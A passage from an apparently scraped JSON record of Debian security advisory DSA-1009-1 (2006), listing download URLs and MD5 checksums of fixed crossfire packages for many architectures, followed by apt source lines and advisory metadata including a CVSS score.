architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_mips.deb\n Size/MD5 checksum: 170520 0853eab7b91be44f7340712aa4cdd671\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_mips.deb\n Size/MD5 checksum: 2035256 79844b4d370cafd330e94566a0d648ff\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_mipsel.deb\n Size/MD5 checksum: 169288 33b97adf5cac97c6c875bdd4b36e381c\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_mipsel.deb\n Size/MD5 checksum: 2035352 bc8cb7e86de9a7d8dd45a2304f7c5a16\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_powerpc.deb\n Size/MD5 checksum: 162678 bb01745d0447bf0ff0059e021582f573\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_powerpc.deb\n Size/MD5 checksum: 1998462 5984f0c34413a56816d251f667eb8742\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_s390.deb\n Size/MD5 checksum: 146146 363914f85b686bb91c6b70acbbe12b73\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_s390.deb\n Size/MD5 checksum: 1969362 fd2f926627e1007841d31cdeb74f82eb\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_sparc.deb\n Size/MD5 checksum: 156562 5a114c075a3a74b6a67309131417d505\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_sparc.deb\n Size/MD5 checksum: 1986776 ed5b96118b9ee6e037dbc931782ade23\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.6.0.dfsg.1-4sarge2.dsc\n Size/MD5 checksum: 712 29da4111a63870ce67ed75a14a4c338c\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.6.0.dfsg.1-4sarge2.diff.gz\n Size/MD5 checksum: 284676 5e40a45fac4a9b0cb828cdd20a8ec3d5\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.6.0.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 4329330 67c8ee71b0539d369231764b19cc787e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-doc_1.6.0.dfsg.1-4sarge2_all.deb\n Size/MD5 checksum: 888740 8d5bca10c51c61f905118dd1342bd5e0\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_alpha.deb\n Size/MD5 checksum: 374720 f0d7b9d29175e6c782397abae95bda50\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_alpha.deb\n Size/MD5 checksum: 2759264 2d103be9f1139ccef05292419a7f9fe6\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_amd64.deb\n Size/MD5 checksum: 340982 d6a0d30f69c174e65798444b26a7ffbf\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_amd64.deb\n Size/MD5 checksum: 2643944 76f0702338eabd86bacc5bf7770d7659\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_arm.deb\n Size/MD5 checksum: 333522 71d3c49ff54106298d8e719d5c1f41ca\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_arm.deb\n Size/MD5 checksum: 2639562 7a22211f4745afa931da217d160d3ba0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_i386.deb\n Size/MD5 checksum: 329094 8106898d7874492399f83ffbb2ac52f2\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_i386.deb\n Size/MD5 checksum: 2625260 5e52ce516bf3ab4c100cc9f7ff51787d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_ia64.deb\n Size/MD5 checksum: 409472 e1bd34614a0833aa566a73f48de8532f\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_ia64.deb\n Size/MD5 checksum: 2854244 7f0ebd5971220d7beaaeedf2bf796f75\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_hppa.deb\n Size/MD5 checksum: 351562 f050142a068a5ff3db8672826ba3a2cc\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_hppa.deb\n Size/MD5 checksum: 2682006 68c5cf62151994d83e0c23fbc71711f0\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_m68k.deb\n Size/MD5 checksum: 307692 2053682d4e1c6fc81f2a27c9bffa8229\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_m68k.deb\n Size/MD5 checksum: 2570064 97af44855c45fdc51c39639654a344e0\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_mips.deb\n Size/MD5 checksum: 348728 4186c9554fdfe3d7b9d90a6c7f5c1b8d\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_mips.deb\n Size/MD5 checksum: 2657662 db60d5c20ede7be0ba33ca5b9ddfdd8e\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_mipsel.deb\n Size/MD5 checksum: 347064 152226eb00bbe0650bf763e9b47af923\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_mipsel.deb\n Size/MD5 checksum: 2656254 40764b19b22bc2e75f83146e6a0e72d9\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_powerpc.deb\n Size/MD5 checksum: 342622 a58d7ae35a639e20d0a42826654c0fcf\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_powerpc.deb\n Size/MD5 checksum: 2651940 b9558856a293a97527919b784009bae9\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_s390.deb\n Size/MD5 checksum: 336700 07dae1c1fb770e9474bdbbed7847def6\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_s390.deb\n Size/MD5 checksum: 2642014 457a9bd118ff00e5bd257c8887cc40c8\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_sparc.deb\n Size/MD5 checksum: 330976 6cfb55259f593ee029a1ed670fb1dfb8\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_sparc.deb\n Size/MD5 checksum: 2626952 b4bddff33520b2ef2f8b16a08201ed6d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2006-03-20T00:00:00", "published": "2006-03-20T00:00:00", "id": "DEBIAN:DSA-1009-1:1A76A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00090.html", "title": "[SECURITY] [DSA 1009-1] New crossfire packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}